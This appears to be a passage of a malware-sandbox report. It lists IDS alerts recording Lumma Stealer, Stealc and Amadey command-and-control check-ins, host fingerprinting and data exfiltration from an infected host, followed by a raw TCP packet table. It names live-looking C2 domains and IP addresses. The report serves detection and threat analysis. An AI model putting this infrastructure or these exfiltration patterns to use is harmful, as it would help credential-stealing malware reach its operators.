2024-11-04T17:33:26.277958+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50172	104.21.5.155	443	TCP
2024-11-04T17:33:26.277958+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50172	104.21.5.155	443	TCP
2024-11-04T17:33:28.215926+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50174	104.21.5.155	443	TCP
2024-11-04T17:33:28.215926+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50174	104.21.5.155	443	TCP
2024-11-04T17:33:33.473087+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50204	185.215.113.206	80	TCP
2024-11-04T17:33:34.640896+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50213	104.21.5.155	443	TCP
2024-11-04T17:33:34.640896+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50213	104.21.5.155	443	TCP
2024-11-04T17:33:36.894035+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50216	104.21.5.155	443	TCP
2024-11-04T17:33:36.894035+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50216	104.21.5.155	443	TCP
2024-11-04T17:33:36.897974+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50216	104.21.5.155	443	TCP
2024-11-04T17:33:37.319487+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50215	185.215.113.206	80	TCP
2024-11-04T17:33:38.467803+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50220	104.21.5.155	443	TCP
2024-11-04T17:33:38.467803+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50220	104.21.5.155	443	TCP
2024-11-04T17:33:38.955645+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50219	185.215.113.206	80	TCP
2024-11-04T17:33:39.009749+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50220	104.21.5.155	443	TCP
2024-11-04T17:33:43.972101+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50225	185.215.113.206	80	TCP
2024-11-04T17:33:45.982252+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50227	185.215.113.206	80	TCP
2024-11-04T17:36:14.127435+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	59120	1.1.1.1	53	UDP
2024-11-04T17:36:14.155765+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	57652	1.1.1.1	53	UDP
2024-11-04T17:36:14.181796+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	61880	1.1.1.1	53	UDP
2024-11-04T17:36:14.207811+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	57123	1.1.1.1	53	UDP
2024-11-04T17:36:14.233586+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	63120	1.1.1.1	53	UDP
2024-11-04T17:36:14.923179+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50308	104.21.5.155	443	TCP
2024-11-04T17:36:14.923179+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50308	104.21.5.155	443	TCP
2024-11-04T17:36:15.663571+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50308	104.21.5.155	443	TCP
2024-11-04T17:36:15.663571+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50308	104.21.5.155	443	TCP
2024-11-04T17:36:15.792623+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	50306	TCP
2024-11-04T17:36:16.365803+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50309	104.21.5.155	443	TCP
2024-11-04T17:36:16.365803+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50309	104.21.5.155	443	TCP
2024-11-04T17:36:16.701748+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50310	185.215.113.43	80	TCP
2024-11-04T17:36:16.893382+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50309	104.21.5.155	443	TCP
2024-11-04T17:36:16.893382+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50309	104.21.5.155	443	TCP
2024-11-04T17:36:17.648147+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50312	104.21.5.155	443	TCP
2024-11-04T17:36:17.648147+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50312	104.21.5.155	443	TCP
2024-11-04T17:36:18.802817+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50313	13.69.116.108	443	TCP
2024-11-04T17:36:19.066762+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50314	104.21.5.155	443	TCP
2024-11-04T17:36:19.066762+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50314	104.21.5.155	443	TCP
2024-11-04T17:36:20.263034+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50315	185.215.113.206	80	TCP
2024-11-04T17:36:20.344699+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50316	104.21.5.155	443	TCP
2024-11-04T17:36:20.344699+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50316	104.21.5.155	443	TCP
2024-11-04T17:36:20.947787+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50317	185.215.113.43	80	TCP
2024-11-04T17:36:21.876454+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50319	104.21.5.155	443	TCP
2024-11-04T17:36:21.876454+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50319	104.21.5.155	443	TCP
2024-11-04T17:36:22.394817+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50319	104.21.5.155	443	TCP
2024-11-04T17:36:23.547275+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50320	104.21.5.155	443	TCP
2024-11-04T17:36:23.547275+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50320	104.21.5.155	443	TCP
2024-11-04T17:36:25.006462+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50321	185.215.113.43	80	TCP
2024-11-04T17:36:25.769545+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	57055	1.1.1.1	53	UDP
2024-11-04T17:36:25.795849+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	62410	1.1.1.1	53	UDP
2024-11-04T17:36:25.813292+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	62410	1.1.1.1	53	UDP
2024-11-04T17:36:25.821208+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	49772	1.1.1.1	53	UDP
2024-11-04T17:36:25.846944+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	62183	1.1.1.1	53	UDP
2024-11-04T17:36:25.872748+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	56860	1.1.1.1	53	UDP
2024-11-04T17:36:25.891335+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	56860	1.1.1.1	53	UDP
2024-11-04T17:36:26.559919+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50323	104.21.5.155	443	TCP
2024-11-04T17:36:26.559919+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50323	104.21.5.155	443	TCP
2024-11-04T17:36:26.729946+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50324	104.21.5.155	443	TCP
2024-11-04T17:36:26.729946+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50324	104.21.5.155	443	TCP
2024-11-04T17:36:27.028511+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50323	104.21.5.155	443	TCP
2024-11-04T17:36:27.028511+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50323	104.21.5.155	443	TCP
2024-11-04T17:36:27.310551+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50324	104.21.5.155	443	TCP
2024-11-04T17:36:27.785544+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50325	104.21.5.155	443	TCP
2024-11-04T17:36:27.785544+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50325	104.21.5.155	443	TCP
2024-11-04T17:36:28.495580+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50325	104.21.5.155	443	TCP
2024-11-04T17:36:28.495580+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50325	104.21.5.155	443	TCP
2024-11-04T17:36:29.368180+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50327	185.215.113.43	80	TCP
2024-11-04T17:36:29.373734+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50328	104.21.5.155	443	TCP
2024-11-04T17:36:29.373734+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50328	104.21.5.155	443	TCP
2024-11-04T17:36:30.514317+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50329	104.21.5.155	443	TCP
2024-11-04T17:36:30.514317+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50329	104.21.5.155	443	TCP
2024-11-04T17:36:32.100291+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50331	104.21.5.155	443	TCP
2024-11-04T17:36:32.100291+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50331	104.21.5.155	443	TCP
2024-11-04T17:36:33.730646+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50332	104.21.5.155	443	TCP
2024-11-04T17:36:33.730646+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50332	104.21.5.155	443	TCP
2024-11-04T17:36:35.576598+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50335	104.21.5.155	443	TCP
2024-11-04T17:36:35.576598+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50335	104.21.5.155	443	TCP
2024-11-04T17:36:36.156995+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50334	185.215.113.206	80	TCP
2024-11-04T17:36:37.539132+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50337	104.21.5.155	443	TCP
2024-11-04T17:36:37.539132+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50337	104.21.5.155	443	TCP
2024-11-04T17:36:38.051591+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50337	104.21.5.155	443	TCP
2024-11-04T17:36:42.256894+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50357	185.215.113.206	80	TCP
2024-11-04T17:36:47.271589+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50368	185.215.113.206	80	TCP
2024-11-04T17:36:58.278233+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	61000	1.1.1.1	53	UDP
2024-11-04T17:36:58.297747+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	61000	1.1.1.1	53	UDP
2024-11-04T17:36:58.317071+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	54492	1.1.1.1	53	UDP
2024-11-04T17:36:58.345058+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	54492	1.1.1.1	53	UDP
2024-11-04T17:36:58.355915+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	62720	1.1.1.1	53	UDP
2024-11-04T17:36:58.376465+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	62720	1.1.1.1	53	UDP
2024-11-04T17:36:58.391567+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	63929	1.1.1.1	53	UDP
2024-11-04T17:36:58.422537+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	63929	1.1.1.1	53	UDP
2024-11-04T17:36:58.432265+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	53112	1.1.1.1	53	UDP
2024-11-04T17:36:58.453748+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	53112	1.1.1.1	53	UDP
2024-11-04T17:36:59.170555+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50374	104.21.5.155	443	TCP
2024-11-04T17:36:59.170555+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50374	104.21.5.155	443	TCP
2024-11-04T17:36:59.613754+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50374	104.21.5.155	443	TCP
2024-11-04T17:36:59.613754+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50374	104.21.5.155	443	TCP
2024-11-04T17:37:00.310729+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50376	104.21.5.155	443	TCP
2024-11-04T17:37:00.310729+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50376	104.21.5.155	443	TCP
2024-11-04T17:37:00.830141+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50376	104.21.5.155	443	TCP
2024-11-04T17:37:00.830141+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50376	104.21.5.155	443	TCP
2024-11-04T17:37:01.600859+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50377	104.21.5.155	443	TCP
2024-11-04T17:37:01.600859+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50377	104.21.5.155	443	TCP
2024-11-04T17:37:03.046202+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50380	104.21.5.155	443	TCP
2024-11-04T17:37:03.046202+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50380	104.21.5.155	443	TCP
2024-11-04T17:37:04.609854+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50382	104.21.5.155	443	TCP
2024-11-04T17:37:04.609854+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50382	104.21.5.155	443	TCP
2024-11-04T17:37:06.053896+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50383	104.21.5.155	443	TCP
2024-11-04T17:37:06.053896+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50383	104.21.5.155	443	TCP
2024-11-04T17:37:06.423680+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50383	104.21.5.155	443	TCP
2024-11-04T17:37:07.230288+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	50384	185.215.113.43	80	TCP
2024-11-04T17:37:07.516808+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50385	104.21.5.155	443	TCP
2024-11-04T17:37:07.516808+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50385	104.21.5.155	443	TCP
2024-11-04T17:37:08.735040+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50387	185.215.113.206	80	TCP
2024-11-04T17:37:10.280397+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50389	104.21.5.155	443	TCP
2024-11-04T17:37:10.280397+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50389	104.21.5.155	443	TCP
2024-11-04T17:37:10.746270+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50389	104.21.5.155	443	TCP
2024-11-04T17:37:20.659204+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50414	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 17:31:09.338148117 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.338176012 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.338202953 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.338227034 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.338239908 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.338387012 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.338440895 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.338515043 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.338572025 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.338588953 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.338601112 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.338640928 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.338675022 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.338689089 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.338727951 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.339380980 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.339421034 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.339433908 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.339462996 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.380546093 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.455399990 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.455450058 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.455465078 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.455552101 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.455831051 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.455894947 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.562978029 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.563028097 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:09.568190098 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.568208933 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.568224907 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:09.568299055 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.224338055 CET	49674	443	192.168.2.5	23.1.237.91
Nov 4, 2024 17:31:10.224339008 CET	49675	443	192.168.2.5	23.1.237.91
Nov 4, 2024 17:31:10.333682060 CET	49673	443	192.168.2.5	23.1.237.91
Nov 4, 2024 17:31:10.343420029 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.343476057 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.343502998 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.343539953 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.343556881 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.343555927 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.343590975 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.343738079 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.343767881 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.343780041 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.343792915 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.343843937 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.343875885 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.343894005 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.343941927 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.344701052 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.396186113 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.407514095 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.407563925 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.412494898 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.412677050 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.412704945 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.412761927 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.901900053 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.901931047 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.901945114 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.901959896 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.901976109 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.901992083 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.902009010 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.902049065 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.902102947 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.902812004 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.902858973 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.902900934 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.902924061 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.902928114 CET	443	49712	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.902965069 CET	49712	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.925744057 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.925791979 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:10.931102037 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.931123018 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.931181908 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.931196928 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.931209087 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:10.933836937 CET	49713	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:10.933901072 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:10.933971882 CET	49713	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:10.934206009 CET	49713	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:10.934218884 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:11.318156958 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:11.318192005 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:11.318207979 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:11.318301916 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:11.318305969 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:11.318319082 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:11.318356991 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:11.318551064 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:11.318567038 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:11.318583965 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:11.318598986 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:11.318624973 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:11.318667889 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:11.318686008 CET	443	49708	20.190.160.22	192.168.2.5
Nov 4, 2024 17:31:11.318732023 CET	49708	443	192.168.2.5	20.190.160.22
Nov 4, 2024 17:31:11.341787100 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:11.341845989 CET	443	49714	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:11.341917038 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:11.342458010 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:11.342474937 CET	443	49714	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:12.043539047 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.043612957 CET	49713	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:12.069577932 CET	49713	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:12.069598913 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.069902897 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.070287943 CET	49713	443	192.168.2.5	40.126.32.74
